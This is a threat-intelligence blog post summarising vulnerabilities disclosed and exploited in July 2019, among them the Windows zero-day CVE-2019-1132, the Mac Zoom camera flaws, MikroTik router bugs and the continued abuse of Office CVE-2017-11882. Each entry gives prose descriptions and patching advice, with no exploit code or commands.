This blog series is aimed to provide an overview of trends in vulnerability disclosures and announcements on a regular basis. Where applicable, it will provide knowledge of known exploits for trending vulnerabilities and relevant courses of action. This report is not exhaustive in nature and as such, will not include every vulnerability announced that month.
Key Findings
- A recently announced Windows Zero-day CVE‑2019‑1132 was exploited to target entities in Eastern Europe.
- The Mac Zoom client was found to be vulnerable to multiple exploits.
- Various activity around the popular Microsoft Office vulnerability CVE-2017-11882 was observed throughout July 2019.
Analysis
Newly Discovered Vulnerabilities
Databases
A SQL injection vulnerability CVE-2019-7003 in the reporting component of Avaya Control Manager could allow an unauthenticated attacker to execute arbitrary SQL commands and retrieve sensitive data related to other users on the system.
Affected versions of Avaya Control Manager include 7.x and 8.0.x versions prior to 8.0.4.0. Unsupported versions not listed here were not evaluated.
Course of Action:
- Upgrade to version 8.0.4.0
Operating Systems
A security flaw in the SMB network attached storage (NAS) devices could allow an unauthenticated user to access files on enterprise and via the API. The vulnerability CVE-2019-6160 affects Iomega and LenovoEMC network attached storage appliances.
5,114 devices storing over 3 million files with card numbers and financial records were exposed.
Course of Action:
- Update Lenovo Firmware for Systems Impacted by CVE-2019-6160
Security researchers discovered that media files related to Telegram and WhatsApp on Android could be exposed and manipulated by threat actors. The security flaw affects WhatsApp for Android by default, and Telegram for Android if the feature "Save to gallery" is enabled.
Due to the flaw, files in the external storage can be viewed and modified by the user and other apps as well.
Over a million apps in Google Play have access due to their write-to-external storage permission.
Course of Action:
- Change default settings for Media Retention on WhatsApp and Telegram
In June 2019, ESET researchers identified a zero-day exploit being used in a highly targeted attack in Eastern Europe.
The exploit is a privilege escalation vulnerability CVE-2019-1132 in Microsoft Windows. The elevation of privilege vulnerability happens in Windows when the Win32k component fails to properly handle objects in memory. To exploit this vulnerability, an attacker would first have to log on to the system.
The vulnerability affects some versions of Windows 7 and Windows Server 2008.
Course of Action:
- Apply June 2019 Microsoft Patch
Researchers identified a vulnerability in the Mac Zoom Client that allows any malicious website to enable user's camera without permission.
This vulnerability CVE-2019-13450 allows any website to force a user to join a Zoom call with their video camera activated.
This vulnerability CVE-2019-13449 allows any webpage to DOS (Denial of Service) a Mac by repeatedly joining a user to an invalid call.
The vulnerabilities leverage the Zoom feature where one can send anyone a meeting link, and when they open that link in their browser their Zoom client is opened on their local machine. This vulnerability also impacts another conferencing service, Ringcentral. According to the researcher who initially discovered these vulnerabilities, Ringcentral for web conference system is a "white labeled Zoom system".
Course of Action:
- Apply Zoom Emergency Update
Routers
Mikrotik RouterOS before 6.44.5 (long-term release tree) is vulnerable to memory exhaustion CVE-2019-13954 . By sending a crafted HTTP request, an authenticated remote attacker can crash the HTTP server and in some circumstances reboot the system. Malicious code cannot be injected.
Mikrotik RouterOS before 6.44.5 (long-term release tree) is vulnerable to stack exhaustion CVE-2019-13955. By sending a crafted HTTP request, an authenticated remote attacker can crash the HTTP server via recursive parsing of JSON. Malicious code cannot be injected.
A vulnerability CVE-2019-13074 in the FTP daemon on MikroTik routers through 6.44.3 could allow remote attackers to exhaust all available memory, causing the device to reboot because of uncontrolled resource management.
Other
A race condition flaw CVE-2019-7614 was found in the response headers Elasticsearch versions before 7.2.1 and 6.8.2 returns to a request. On a system with multiple users submitting requests, it could be possible for an attacker to gain access to response header containing sensitive data from another user.
A local elevation of privilege vulnerability CVE-2019-0880 exists in how splwow64.exe handles certain calls. An attacker who successfully exploited the vulnerability could elevate privileges on an affected system from low-integrity to medium-integrity.
This vulnerability by itself does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability (such as a remote code execution vulnerability or another elevation of privilege vulnerability) that is capable of leveraging the elevated privileges when code execution is attempted.
Course of Action:
- Apply June 2019 Microsoft Patch
Threat actors are abusing a Microsoft Excel feature called Power Query to execute malicious code on a targeted machine. The new malicious technology uses malformed Excel documents to reference data from an attacker's remote server via Power Query. MS Excel Dynamic Data Exchange Protocol
The technique bypasses security appliances that analyze documents sent via email. It relies on the Attack Pattern: Victim Initiating Power Query Exploit .
Versions of Microsoft from 2010 are enabled for Power Query.
Course of Action:
- The microsoft advisory KB4053440 addresses the issue.
Ongoing Exploitation of Vulnerabilities
July 2019 has seen the continued exploitation of the popular Microsoft Office vulnerability CVE-2017-11882.
As previously observed, the vulnerability is being used to target financial institutions through email attacks. The unique usage in this attack-chain is that the emails leverage CVE-2017-11882 to install the "Heavens Gate" loader. The ultimate goal is to deliver commodity malware leveraging loader. The loader is capable of downloading a variety of "commodity" malware including Malware Variant: Remcos d0eadc , Malware Variant: Agent Tesla 01df01 , Malware Variant: Hawkeye d0eadc , and various Crypto-miners.
EclecticIQ Analysts also reported ( Multiple Chinese Groups Share the Same RTF Weaponizer ) on a RTF Weaponizer being used by multiple Chinese actors where one of the exploits weaponized is CVE-2017-11882.
Attack Pattern: MS-Word Attachments Weaponized with Exploits. This explains the high number of attacks as well as lends credence to the confidence that threat actors have in the successful exploitation of the vulnerability.
In a report ( Silence Group Likely Behind Recent $3M Bangladesh Bank Heist ) the initial attack vector most likely included the exploitation of common vulnerabilities initiated by spearphishing attacks. The vulnerabilities previously used by the possible actors behind the theft, Intrusion Set: Silence , includes CVE-2017-0199, CVE-2017-11882, CVE-2018-0802, CVE-2017-0262, and CVE-2018-8174.
This vulnerability is only as prolific as it is because of outdated software. As long as basic infrastructure upgrades, like that of Microsoft Office, are backlogged or ignored, the exploitation of CVE-2017-11882 will continue.
TrendMicro researchers have identified a new campaign targeting Elasticsearch servers to turn them into DDoS Botnet zombies.
As part of the attack-chain, threat actors exploit CVE-2015-1427 with a malicious URL after being scanned and detected as vulnerable (Elasticsearch versions 1.3.0 – 1.3.7 and 1.4.0 – 1.4.2). The request will download the dropper that ultimately installs the Malware Variant: Setag 98ffe4 which bears the hallmarks of the BillGates malware, first encountered in 2014 and known for being used to hijack systems and initiate DDoS attacks. Of late, variants of the BillGates malware have been observed to be involved in botnet-related activities.
Patched Vulnerabilities
Google patched a total of 33 security vulnerabilities in various components of Android in July 2019.
The most severe flaws affect Android Media framework and the Android system. These flaws might be exploited by a remote attacker to execute arbitrary code within the context of a privileged user.
The flaws within the Android Media framework CVE-2019-2106 , CVE-2019-2107 , CVE-2019-2109 could allow a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.
The issues affect all Android 7.0 or later devices, with Android 9.0 being an exception. The fourth critical flaw CVE-2019-2111 is a remote code execution vulnerability in the Android system that could be exploited for arbitrary code execution within the context of a privileged user. It affects only Android 9.0 devices.
There is no evidence any of the flaws have ever been exploited in the wild.
Course of Action:
- Apply July 2019 Android Update
Recommendations
EclecticIQ Fusion Center recommends customers apply security updates to their systems as soon as they become available, in order to mitigate against the risks posed by the vulnerabilities mentioned in this report. It is worth noting this report is a summary of the main vulnerabilities we have seen over the course of a month and as such is not reflective of the full list of CVE information published by vendors.
Users should ensure they manually update their own systems dependent even if they are not mentioned in this report.
We hope you enjoyed this post. Subscribe to our blog for more interesting reads on Cyber Threat Intelligence or check out our resource section for whitepapers, threat analysis reports and more.